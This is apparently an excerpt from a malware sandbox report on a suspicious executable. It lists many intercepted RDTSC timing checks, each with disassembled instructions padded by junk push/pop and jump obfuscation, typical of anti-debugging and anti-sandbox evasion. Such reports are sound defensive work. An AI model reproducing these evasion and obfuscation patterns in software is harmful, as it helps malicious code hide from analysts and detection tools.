Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 479D87 second address: 479D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAD0D216D56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 479D91 second address: 479DA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FAD0CDA85FCh 0x0000000c jbe 00007FAD0CDA85F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 479EF9 second address: 479EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 47A41F second address: 47A43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAD0CDA85F6h 0x0000000a pop esi 0x0000000b push ecx 0x0000000c jmp 00007FAD0CDA85FEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 480251 second address: 480257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 480257 second address: 48027D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FAD0CDA8608h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 48027D second address: 480283 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 396D5B second address: 396D74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0CDA8605h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 396D74 second address: 396D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3970F0 second address: 3970FE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FAD0CDA85F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51504D3 second address: 51504E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FAD0D216D5Dh 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51504E6 second address: 5150526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD0CDA85FCh 0x00000009 xor ecx, 2F9CCAE8h 0x0000000f jmp 00007FAD0CDA85FBh 0x00000014 popfd 0x00000015 mov ecx, 091EC2DFh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ecx, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FAD0CDA8601h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5150526 second address: 515052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 515052C second address: 5150530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5150552 second address: 5150567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180611 second address: 518067B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD0CDA8601h 0x00000009 and si, FAE6h 0x0000000e jmp 00007FAD0CDA8601h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FAD0CDA8600h 0x0000001a xor eax, 3C62D688h 0x00000020 jmp 00007FAD0CDA85FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FAD0CDA8605h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 518067B second address: 518069A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 mov bl, al 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 518069A second address: 51806A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51806A0 second address: 51806A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51806A4 second address: 51806A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51806A8 second address: 51806C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAD0D216D65h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51806C8 second address: 51806D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0CDA85FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51806D8 second address: 51806DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51806DC second address: 5180736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FAD0CDA8607h 0x0000000f xchg eax, ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 call 00007FAD0CDA8602h 0x00000017 pop eax 0x00000018 mov cl, bl 0x0000001a popad 0x0000001b call 00007FAD0CDA85FCh 0x00000020 pushad 0x00000021 popad 0x00000022 pop eax 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FAD0CDA85FDh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180736 second address: 518073C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 518073C second address: 5180740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180740 second address: 5180744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180744 second address: 5180774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007FAD0CDA85FFh 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAD0CDA8605h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180774 second address: 518077A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 518077A second address: 518077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 518077E second address: 51807F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FAD0D216D66h 0x0000000e xchg eax, esi 0x0000000f jmp 00007FAD0D216D60h 0x00000014 lea eax, dword ptr [ebp-04h] 0x00000017 pushad 0x00000018 mov cx, AD3Dh 0x0000001c mov ax, E039h 0x00000020 popad 0x00000021 nop 0x00000022 jmp 00007FAD0D216D64h 0x00000027 push eax 0x00000028 pushad 0x00000029 mov ebx, 485456F4h 0x0000002e mov bl, EEh 0x00000030 popad 0x00000031 nop 0x00000032 jmp 00007FAD0D216D64h 0x00000037 push dword ptr [ebp+08h] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51807F8 second address: 51807FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51807FC second address: 5180819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180819 second address: 5180829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0CDA85FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180829 second address: 518082D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180852 second address: 51808BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD0CDA8607h 0x00000009 and ax, D15Eh 0x0000000e jmp 00007FAD0CDA8609h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov esi, eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FAD0CDA8603h 0x00000022 jmp 00007FAD0CDA8603h 0x00000027 popfd 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51808BF second address: 51808C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51808C5 second address: 51808ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FAD0CDA863Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAD0CDA8608h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51808ED second address: 51808F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51808F3 second address: 51808F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180931 second address: 5180937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180937 second address: 5180946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0CDA85FBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5180946 second address: 517004F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAD0D216D5Ch 0x00000013 adc eax, 59684868h 0x00000019 jmp 00007FAD0D216D5Bh 0x0000001e popfd 0x0000001f jmp 00007FAD0D216D68h 0x00000024 popad 0x00000025 retn 0004h 0x00000028 nop 0x00000029 sub esp, 04h 0x0000002c xor ebx, ebx 0x0000002e cmp eax, 00000000h 0x00000031 je 00007FAD0D216EBAh 0x00000037 mov dword ptr [esp], 0000000Dh 0x0000003e call 00007FAD121C2EF1h 0x00000043 mov edi, edi 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007FAD0D216D5Ah 0x0000004c xor ax, C728h 0x00000051 jmp 00007FAD0D216D5Bh 0x00000056 popfd 0x00000057 popad 0x00000058 push ebp 0x00000059 jmp 00007FAD0D216D62h 0x0000005e mov dword ptr [esp], ebp 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FAD0D216D67h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 517004F second address: 5170055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170055 second address: 51700B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push ecx 0x0000000f pushfd 0x00000010 jmp 00007FAD0D216D5Bh 0x00000015 adc eax, 19BE5B2Eh 0x0000001b jmp 00007FAD0D216D69h 0x00000020 popfd 0x00000021 pop esi 0x00000022 popad 0x00000023 sub esp, 2Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FAD0D216D69h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51700B6 second address: 51700C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0CDA85FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51700C6 second address: 51700DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51700DE second address: 51700F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51700F9 second address: 51700FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51700FF second address: 517011C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA85FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, 78D2C061h 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 517011C second address: 517017B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FAD0D216D66h 0x0000000f xchg eax, edi 0x00000010 jmp 00007FAD0D216D60h 0x00000015 push eax 0x00000016 jmp 00007FAD0D216D5Bh 0x0000001b xchg eax, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov dh, D0h 0x00000021 call 00007FAD0D216D5Ch 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 517017B second address: 5170181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170181 second address: 5170185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51701B3 second address: 51701B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51701B9 second address: 51701BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51701BD second address: 51701D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA85FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51701D6 second address: 51701DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51701DA second address: 51701E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51701E0 second address: 51701FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0D216D66h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51701FA second address: 517020D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 517020D second address: 5170213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170213 second address: 5170280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a jmp 00007FAD0CDA8600h 0x0000000f test al, al 0x00000011 pushad 0x00000012 mov eax, 23C3FA2Dh 0x00000017 pushad 0x00000018 push eax 0x00000019 pop edi 0x0000001a mov bx, cx 0x0000001d popad 0x0000001e popad 0x0000001f je 00007FAD0CDA87D1h 0x00000025 jmp 00007FAD0CDA85FEh 0x0000002a lea ecx, dword ptr [ebp-14h] 0x0000002d jmp 00007FAD0CDA8600h 0x00000032 mov dword ptr [ebp-14h], edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FAD0CDA85FAh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170280 second address: 5170284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170284 second address: 517028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 517028A second address: 5170290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170290 second address: 5170294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170294 second address: 5170298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 517032B second address: 5170331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170331 second address: 5170335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170335 second address: 51703C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8603h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e jmp 00007FAD0CDA8604h 0x00000013 pushfd 0x00000014 jmp 00007FAD0CDA8602h 0x00000019 xor si, FE98h 0x0000001e jmp 00007FAD0CDA85FBh 0x00000023 popfd 0x00000024 popad 0x00000025 jg 00007FAD7D6966F8h 0x0000002b jmp 00007FAD0CDA8606h 0x00000030 js 00007FAD0CDA8673h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FAD0CDA8607h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51703C5 second address: 51703DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7A3EA6CAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [ebp-14h], edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51703DB second address: 51703DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51703DF second address: 51703F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51703F7 second address: 5170409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0CDA85FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 5170409 second address: 517044C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FAD7DB04DD7h 0x00000011 pushad 0x00000012 mov bx, ax 0x00000015 mov cx, 40D7h 0x00000019 popad 0x0000001a mov ebx, dword ptr [ebp+08h] 0x0000001d jmp 00007FAD0D216D5Ah 0x00000022 lea eax, dword ptr [ebp-2Ch] 0x00000025 pushad 0x00000026 movzx ecx, dx 0x00000029 mov dh, 2Ch 0x0000002b popad 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov ax, di 0x00000033 mov di, 898Eh 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 517044C second address: 517047E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAD0CDA8602h 0x00000008 pop esi 0x00000009 mov ax, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAD0CDA8603h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 517047E second address: 517049C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2F87DFAAh 0x00000008 call 00007FAD0D216D5Bh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 517049C second address: 51704A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51704A0 second address: 51704A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51704A6 second address: 51704C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0CDA8606h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 51704C0 second address: 5170500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a call 00007FAD0D216D5Ah 0x0000000f mov ch, C8h 0x00000011 pop edi 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 jmp 00007FAD0D216D66h 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAD0D216D5Ah 0x00000025 rdtsc
